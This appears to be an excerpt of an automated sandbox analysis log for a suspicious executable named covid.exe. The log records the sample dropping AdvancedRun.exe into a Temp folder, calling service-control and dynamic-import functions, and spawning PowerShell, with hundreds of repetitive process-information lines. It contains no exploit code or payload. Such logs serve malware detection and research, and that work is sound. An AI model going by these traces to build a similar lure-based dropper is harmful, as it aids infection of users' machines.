Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00408E31
Source: C:\Users\user\Desktop\covid.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
